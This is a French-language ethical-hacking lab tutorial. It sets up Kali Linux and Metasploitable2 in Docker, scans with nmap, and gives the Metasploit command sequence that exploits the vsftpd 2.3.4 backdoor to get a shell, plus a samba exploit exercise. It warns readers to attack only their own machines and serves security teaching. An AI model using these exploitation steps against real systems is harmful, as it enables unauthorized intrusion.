Metasploit est un cadriciel (framework) modulaire développé pour faciliter la pénétration de systèmes.  Il est très puissant et permet de lancer des exploits sur la machine cible dans le but de la compromettre et d’obtenir un accès.

Metasploit possède plus de 1000 modules d’exploitation (code pour exploiter les vulnérabilités) et plus de 300 paylods (code à exécuter suite à l’exploitation d’une vulnérabilité). D’autres modules sont aussi disponibles : auxiliaires, post, encodeurs (éviter la détection par les antivirus) et NOPs.

Ces modules peuvent être des scripts Ruby, Perl, Python, Php ou du code source C et C++ (devra être modifié et compilé avec gcc avant l’exécution).

logo de metasploit

Tutoriel vidéo sur l’exercice de piratage éthique avec Metasploit

Voici la dernière version du tutoriel vidéo qui présente les étapes du piratage éthique avec Kali Linux, Metasploit, Metasploitable2 et Docker. Vous avez l’option de suivre la vidéo ou de lire l’article.

Bonne chance!

Configurer les machines Docker pour le Piratage éthique

Pirate informatique avec un chapeau blanc

La procédure suivante vous permettra de télécharger et d’installer l’environnement nécessaire pour réaliser un exercice simple de piratage éthique. Le piratage éthique consiste à utiliser les outils des hacker afin de vérifier la sécurité de notre écosystème numérique (serveur, logiciels, réseau).

La procédure suivante vous permettra de télécharger et d’installer l’environnement nécessaire pour réaliser un exercice simple de piratage éthique. Le piratage éthique consiste à utiliser les outils des hacker afin de vérifier la sécurité de notre écosystème numérique (serveur, logiciels, réseau).

N’oubliez pas que ces outils doivent être utilisés sur vos serveurs afin de les sécuriser. Ne vous attirez pas de problème en exploitant des failles sur des machines qui ne vous appartiennent pas. Cette action irait à l’encontre du principe du piratage éthique et des valeurs des chapeaux blancs (white hat)

logo de metasploit

Tirer l’image Docker de Kali Linux

  • docker pull kalilinux/kali-rolling

Installer les dépendances à l’intérieur de Docker

  • docker run -it kalilinux/kali-rolling /bin/bash
  • apt-get update && apt-get install metasploit-framework nano iputils-ping dirb sqlmap hurl

Sauvegarder Kali avec ses nouvelles dépendances

  • docker ps -l
  • docker commit [Container_ID] kali

Lancer Kali Linux avec Metasploit sur Docker

  • docker run -it kali /bin/bash

Tirer l’image de Metasploit

  • docker run -it kali /bin/bash

Lancer les services vulnérables de Metasploitable

  • docker run –name metaspoitable2 -it tleemcjr/metasploitable2:latest sh -c « /bin/services.sh && bash »

Lancer la console Metasploit

Lancez msfconsole et vérifiez que la page d’accueil s’affiche. Vous y trouverez des statistiques sur les exploits disponibles.

$ service postgresql start

$ msfdb init

$ msfconsole

Maintenant que nous avons la confirmation que Metasploit est fonctionnel, trouvons une cible à attaquer.

Metasploitable2 sur Linux

Metasploitable2 est une machine virtuelle bourrée de failles, une cible idéale pour les débutants. Elle permet de mettre votre expertise du cadriciel Metasploit à l’épreuve.

Une fois lancée, vérifiez que les deux machines sont sur le même réseau.

$ ifconfig
$ ping

Reconnaissance active avec nmap

À partir de Kali, lancez nmap sur la machine Metasploitable2

$ nmap [ip-metasploitable2]

$ nmap -sV [ip-metasploitable2]

-sV : Analyse les ports ouverts et tente de déterminer le nom du service ainsi que sa version.

Exploitation d’une faille avec Metasploit – Procédure générale

Rechercher une faille

Parmi les services ouverts identifiés à l’étape précédente, lancez la commande search afin d’identifier des exploits possibles.

$ msf> search  [mot-clé]

Afficher l’information d’une faille

Affiche de l’info supplémentaire sur l’exploit. Il est recommandé de tenter sa chance avec l’exploit ayant le plus haut rang (rank). La section des options vous permettra de voir les variables (ex : RHOSTS, RPORT) qui devront être configurées (avec la commande set) avant la phase d’exploitation.

$ msf> info [nom-exploit]

Activer et configurer un exploit

$ msf> use [nom-exploit]

Définir les valeurs de variables

$ msf exploit(nom_exploit)> set RHOSTS [ip-metasploitable]
$ msf exploit(nom_exploit)> set RPORT [port-metasploitable]

Lancer l’exploit

Finalement lancer l’exploit avec la commande exploit.

$ msf exploit(nom_exploit)> exploit

Si l’exploit est réalisé avec succès, vous pourriez obtenir un accès à la ligne de commande de la machine cible.

Exploitation de la faille vsftpd 2.3.4 avec Metasploit

Suivez les étapes suivantes :

$ service postgresql start
$ msfdb init
$ msfconsole
$ search vsftpd
$ msf> info unix/ftp/vsftpd_234_backdoor
$ msf> use unix/ftp/vsftpd_234_backdoor
$ msf exploit(nom_exploit)> set RHOSTS [ip-metasploitable]
$ msf exploit(nom_exploit)> set RPORT 21
$ msf exploit(nom_exploit)> exploit

Une fois le shell ouvert, exécutez les commandes suivantes :

$ whoami
$ hostname
$ uname -a
$ id
$ ifconfig

Exercice

  • Tenter d’exploiter la machine Metasploitable2 avec le module exploit/multi/samba/usermap_script.

Exercice

  1. Tenter d’exploiter la machine Metasploitable2 avec le module exploit/multi/samba/usermap_script.
  2. Tenter d’exploiter Metasploitable2 avec d’autres failles. Faire la liste des failles exploitables.

Joignez la communauté!

Restez informés! Techno, programmation et cybersécurité.

Facebook Comments